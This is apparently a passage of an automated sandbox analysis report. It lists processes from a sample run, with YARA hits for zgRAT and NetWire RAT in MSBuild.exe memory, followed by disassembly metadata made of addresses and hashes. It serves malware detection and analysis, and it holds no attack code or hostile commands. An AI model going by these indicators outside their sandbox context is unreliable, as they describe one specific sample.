                      • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000014.00000002.527972501.0000000008130000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      Reputation:low

                      General

                      Target ID:25
                      Start time:03:07:32
                      Start date:11/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Imagebase:0x190000
                      File size:261728 bytes
                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:26
                      Start time:03:07:33
                      Start date:11/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Imagebase:0x20000
                      File size:261728 bytes
                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:28
                      Start time:03:07:38
                      Start date:11/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Imagebase:0x630000
                      File size:261728 bytes
                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:high

                      General

                      Target ID:30
                      Start time:03:08:06
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                      Imagebase:0xc20000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:32
                      Start time:03:08:06
                      Start date:11/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c9170000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:33
                      Start time:03:08:07
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout 20
                      Imagebase:0x12c0000
                      File size:26112 bytes
                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:35
                      Start time:03:08:09
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                      Imagebase:0xc20000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:36
                      Start time:03:08:09
                      Start date:11/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c9170000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:37
                      Start time:03:08:10
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout 20
                      Imagebase:0x12c0000
                      File size:26112 bytes
                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language

                      Disassembly

                      Reset < >

                        Executed Functions

                        Function 00F06450 Relevance: .7, Instructions: 679COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522335190.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f00000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 592d42b66e3aff7805ebb96cf6f9c526b997157e89333d71edeca167c259b1b4
                        • Instruction ID: be6ddf9f99331ff2b54c5bdefdb193a80980a10fe36808032818ea3dcebc74a5
                        • Opcode Fuzzy Hash: 592d42b66e3aff7805ebb96cf6f9c526b997157e89333d71edeca167c259b1b4
                        • Instruction Fuzzy Hash: 2E32A132F447208BDF356B24956413E36A7EBC9725B168819D882DB3C0DF759C63B782
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F05F30 Relevance: .3, Instructions: 269COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522335190.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f00000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bce7275c8220a3efb8a401982336797706cbf33e53cabf381ce31d522fea9ffb
                        • Instruction ID: 1c46a5d67a741571dae015d7ef6c99f35ed6141f6c39727ac006cb0f9ebe1a5c
                        • Opcode Fuzzy Hash: bce7275c8220a3efb8a401982336797706cbf33e53cabf381ce31d522fea9ffb
                        • Instruction Fuzzy Hash: 53817F31F483228FCE351625562833F6296AB85F71B268479D907CB3C0DE74CC62B7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F44B90 Relevance: .2, Instructions: 219COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 427d48e14736f5400aab0668153e3252b886071235d4af7de372b279fb94768f
                        • Instruction ID: 922e4bf50df244ef18c44f576e4ca4119a7144bd500ef3a38b405f4e16e22272
                        • Opcode Fuzzy Hash: 427d48e14736f5400aab0668153e3252b886071235d4af7de372b279fb94768f
                        • Instruction Fuzzy Hash: B181AE30B046008FC724EF69D594B6ABBF2EB89314F158169E905AB791DB34FC46CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D464D5 Relevance: .2, Instructions: 216COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35225dc67337b439e6eca3ca10181c4fee8dd0d12ee5803d9516f175a2693d9b
                        • Instruction ID: 32ee1f0e8b2f26fcba29ab1dcfe9c3663dc7b4e9ff885e369398e5eadba7f981
                        • Opcode Fuzzy Hash: 35225dc67337b439e6eca3ca10181c4fee8dd0d12ee5803d9516f175a2693d9b
                        • Instruction Fuzzy Hash: B1914534B046049BDB14DF24D498B6AB7A2FB86305F149129D84367B98EB38FC95DF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4CBC8 Relevance: .2, Instructions: 215COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f2a5125750b43a6c8a79be7e713d90cd35b43cca609899b79b5b0ddadd8bd19
                        • Instruction ID: cd166d1e254108c1641b1d1259c8749b3fbbdc118645be1eb5da1d6f69a10172
                        • Opcode Fuzzy Hash: 2f2a5125750b43a6c8a79be7e713d90cd35b43cca609899b79b5b0ddadd8bd19
                        • Instruction Fuzzy Hash: 7471E136A09208CFCB54CFB5C4856AEBBB2FF85310F2681AAD9059B761D734AC41DBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4B920 Relevance: .2, Instructions: 207COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff5aafca9ba0ae208d89c750c66126ada4b85ceed5021091d708bd540ddbdcc2
                        • Instruction ID: 40b4cdbe701b54cbf9f5f61fc24e3a3f7da1e1e2e46a24214ae7c8afe9e6d44a
                        • Opcode Fuzzy Hash: ff5aafca9ba0ae208d89c750c66126ada4b85ceed5021091d708bd540ddbdcc2
                        • Instruction Fuzzy Hash: 8F719031F04205DBEB14CB54D8A4B6B7BB2EBC4350F148429EE0697796DB78DC91EB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48E29 Relevance: .2, Instructions: 190COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0503b96ca5a132900a922441e6a7dd1774900157dc1367b1d813f789ef188c68
                        • Instruction ID: 6242955891311d949b984dd125bd1cb2bf6b441d2f6764d6ee1285ed49b26f12
                        • Opcode Fuzzy Hash: 0503b96ca5a132900a922441e6a7dd1774900157dc1367b1d813f789ef188c68
                        • Instruction Fuzzy Hash: D5711331608601CFD724DF64D45476BBBF2EB84364F14C929D90A8B7A1DB38ED86EB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F49FB0 Relevance: .2, Instructions: 179COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e3f3d61a4fb0a636dbb9fc94b4aa2b93507f57ad4a5659b24618a30972b80ab8
                        • Instruction ID: bbe795eb518a1a5268e15a8bc33331fbc486416d887e07deb31116bb90366d5a
                        • Opcode Fuzzy Hash: e3f3d61a4fb0a636dbb9fc94b4aa2b93507f57ad4a5659b24618a30972b80ab8
                        • Instruction Fuzzy Hash: F9719231E08208CFDB00CF94D544BAEBBF2EB88314F248565D902AB754D7B8AD46EF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F448A8 Relevance: .2, Instructions: 178COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: abb768a4d2c2c553d41f9e0cdc6884cf5c2aee0a977b24d70ef5cc1885997ca6
                        • Instruction ID: a88cde1fb472b918346b0b4e718b987f19ce7105891f0155df01a85166c04c0f
                        • Opcode Fuzzy Hash: abb768a4d2c2c553d41f9e0cdc6884cf5c2aee0a977b24d70ef5cc1885997ca6
                        • Instruction Fuzzy Hash: 5C616D36604100DFCB069FA4C954E5A7FB2FF4D314B1A80E9E6069B272DB36EC65EB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F49FA0 Relevance: .2, Instructions: 170COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d346a933e8c09424b0b7ac4a66468abefd1cbe9ee00d6ef3f9010818223a63f0
                        • Instruction ID: 54cbbd578426c915df96bd9613916eaba0cc57c0c91ec692305f8af3eaf7fceb
                        • Opcode Fuzzy Hash: d346a933e8c09424b0b7ac4a66468abefd1cbe9ee00d6ef3f9010818223a63f0
                        • Instruction Fuzzy Hash: F5619331E08208CFDB00CF54D544BAEBBF2EB88314F248565D902AB754D7B9AD46EF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4B910 Relevance: .2, Instructions: 168COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 71c3fe859b92bda38e1361e9dd579bd07cb855bd9767e8f4b6db2069dd1f4c0b
                        • Instruction ID: dc7e49221d009f1f1925f1166e4cd8d7c65c9edc10efeb218e100aa066778a05
                        • Opcode Fuzzy Hash: 71c3fe859b92bda38e1361e9dd579bd07cb855bd9767e8f4b6db2069dd1f4c0b
                        • Instruction Fuzzy Hash: 4A519131F08105DFEB148B54E498B6A7BB2EBC8360F188429DD0697796DB78EC91EB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F448D0 Relevance: .2, Instructions: 164COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cd0ad4b9559f2de2e08e754d41a2eee6ae5f7b0859a75836f6db82b9b0dc53e
                        • Instruction ID: 54770cc5cc0de37fc5a6630bf77dc77a1e979fc5c7c1069254a9f0fe33a6f94e
                        • Opcode Fuzzy Hash: 1cd0ad4b9559f2de2e08e754d41a2eee6ae5f7b0859a75836f6db82b9b0dc53e
                        • Instruction Fuzzy Hash: 5E512C36600100EFDB459F94C948E5A7BB3FF4D314B1680A4E60AAB372DB36EC61EB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4A23B Relevance: .2, Instructions: 153COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b3a2431330c3d24032294e8cbd52b4af6e13b5072c6f601fcefb2934bf4206ba
                        • Instruction ID: 85bc6576aa7067caf73a90a5a8d34186d013811c617b9aad71e6071371cd79c2
                        • Opcode Fuzzy Hash: b3a2431330c3d24032294e8cbd52b4af6e13b5072c6f601fcefb2934bf4206ba
                        • Instruction Fuzzy Hash: FF51A335E48208CFDB00CF54D544BAEBBB2FB88314F248565D902AB794D7B8AD46EF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4CBB8 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 793a04692005720bed5048bad66f06c1f4c239ac8f8ed23a3c6a1632850ba6d8
                        • Instruction ID: bdd900597e5f0dc5977b6a58e7d05ec64d1d49c447261b9848ecf9e22c6a8ec1
                        • Opcode Fuzzy Hash: 793a04692005720bed5048bad66f06c1f4c239ac8f8ed23a3c6a1632850ba6d8
                        • Instruction Fuzzy Hash: CB51BD35E09208CFCB40CF65C485BAABBB2FF88310F259166D9059B361D774AC81EBD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F43EF3 Relevance: .1, Instructions: 129COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a32d3b3e9b103ab29c85c947b12ec4be2a502c168bf4ca3877547614f64b0928
                        • Instruction ID: 2cf646faf01eb9f146439b4148d87c8156aad14f7d66fb77d2d1730c48e5632c
                        • Opcode Fuzzy Hash: a32d3b3e9b103ab29c85c947b12ec4be2a502c168bf4ca3877547614f64b0928
                        • Instruction Fuzzy Hash: EC411731B0C2408FDB059B68E82575B7FF6DF8A310F04846AE645CB387DA389D568792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F44B8D Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78f0b2a8f228bf6d16f00189a701c1303513a34219591a011ca68ad554e769e5
                        • Instruction ID: b6191d9ddefef14a28d228362e806a51e3b1814dd14ead99e9a191936ac1ed96
                        • Opcode Fuzzy Hash: 78f0b2a8f228bf6d16f00189a701c1303513a34219591a011ca68ad554e769e5
                        • Instruction Fuzzy Hash: 4D519034A006008FCB24DF69D598A59BBF2FF88314B15C569D816AB7A1EB34FD45CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D4F1C0 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b97bb99cfd87da23ef15b8fc905ae79e354a80eb0197876462f8703a6e9bfa26
                        • Instruction ID: a32e78aafc0816cffdb461919b605b1f7d7fb5a2a2aadfc03ecdf76581086c8a
                        • Opcode Fuzzy Hash: b97bb99cfd87da23ef15b8fc905ae79e354a80eb0197876462f8703a6e9bfa26
                        • Instruction Fuzzy Hash: 3B416B74F08245CBEB04DFB5D0847AE73E2EBC8314F148439D442ABB65EB38B8868B55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F07020 Relevance: .1, Instructions: 123COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522335190.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f00000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 376722825da95cd2f705114e3e1a00f4c956feccfbc753855a467c0b9e840678
                        • Instruction ID: 394218228924f727b591fb5e453c96314c76d007dab1bbd1e12c02212670502e
                        • Opcode Fuzzy Hash: 376722825da95cd2f705114e3e1a00f4c956feccfbc753855a467c0b9e840678
                        • Instruction Fuzzy Hash: 5D31BE32F583218B8E3B7624616123E21878BC6B6175595E9D803DF3C0DF65AC037BE6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D48BFB Relevance: .1, Instructions: 119COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: be4ebe1fd8a36cc3d4d035d7a0cd5d9d01a6623b096770003ec47c458a31b1e3
                        • Instruction ID: c66f5a073f9470ace3e6371388b84d225bd65cd532ab1def0cc80351434ac1b6
                        • Opcode Fuzzy Hash: be4ebe1fd8a36cc3d4d035d7a0cd5d9d01a6623b096770003ec47c458a31b1e3
                        • Instruction Fuzzy Hash: 3B412734B001048FDB04EFA4D954A6E77A3FBC9344F148169E406AB7A5EB79BC82DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48673 Relevance: .1, Instructions: 114COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd5510d0bd7492b9e080796cd47c10f43b4fa4a2dd434b5be2eb6512c687443f
                        • Instruction ID: 665203c3cfd170ec93a14765d4f900c3b54a9792db1f0784b117bf6f60c2fddd
                        • Opcode Fuzzy Hash: fd5510d0bd7492b9e080796cd47c10f43b4fa4a2dd434b5be2eb6512c687443f
                        • Instruction Fuzzy Hash: 78410131A04518DFDB40DF58D854FAF7BA2EB88350F218428E906A7385DF755D43EB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48680 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8bbd6b5c824f1792a9581c7355192bf618b16c71f07d9ed376a84fe1764f7157
                        • Instruction ID: 83121f1caba284db5c9e8527a95088ec98788cf7d0e39bc3c764039277978a58
                        • Opcode Fuzzy Hash: 8bbd6b5c824f1792a9581c7355192bf618b16c71f07d9ed376a84fe1764f7157
                        • Instruction Fuzzy Hash: 4F41FF31A04518DFDB40DF58D894FAFBBA6EB88360F208438E906A7385DF749D42EB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F430DA Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 635f4910206a69c85f44f2bb27e340e2394fe6817053a1b8a4accabeba13ef98
                        • Instruction ID: 288a9027a8436eb13353f397f8a9659756673c01bbd9f9731d01e557643abd84
                        • Opcode Fuzzy Hash: 635f4910206a69c85f44f2bb27e340e2394fe6817053a1b8a4accabeba13ef98
                        • Instruction Fuzzy Hash: 35215772E092D49FCB129BB488212BE7FB58BC6300F1440EAD842DB292DE640E06A3D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4A758 Relevance: .1, Instructions: 100COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd4d4cd5e9068694e1e09873a5fa87526181dee48759432b1fd69e2c4f2ad799
                        • Instruction ID: 0caae9ea1ca42ca3dde29a86156fb97bd3022ec657ee65663361d9f0ca9df4f2
                        • Opcode Fuzzy Hash: fd4d4cd5e9068694e1e09873a5fa87526181dee48759432b1fd69e2c4f2ad799
                        • Instruction Fuzzy Hash: BA31D435F881148BDB10CE68D405B6B7BB6E7C8710F248526ED01E7385DB799C52AB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4A74B Relevance: .1, Instructions: 99COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c01bbdb4a8cd7c4dfbea45de8f23e09246475a844a33bbbccc18681ba57fec2
                        • Instruction ID: 2985b22ac62a75f8e6ca5f97bbcc9023f7f5d19374d01dcb5479f56c7d7b1819
                        • Opcode Fuzzy Hash: 0c01bbdb4a8cd7c4dfbea45de8f23e09246475a844a33bbbccc18681ba57fec2
                        • Instruction Fuzzy Hash: F831F232F851148BDB108B28D805B7BBBB6E788710F248536ED01EB781D7789C42EB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4540F Relevance: .1, Instructions: 98COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97fc13939326c08753406d62ca743ffd87ac8c1e6f3505d59d67746536736537
                        • Instruction ID: b5bae25fd287674c26f48ef28d94f92c41aa50b7eb448f8c2693a8a6be6e05ac
                        • Opcode Fuzzy Hash: 97fc13939326c08753406d62ca743ffd87ac8c1e6f3505d59d67746536736537
                        • Instruction Fuzzy Hash: 42411734A00508CFEB24EF64C498BAD7BF2FB49B04F1540A9E905AB3A2D774AD91DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F46D1D Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
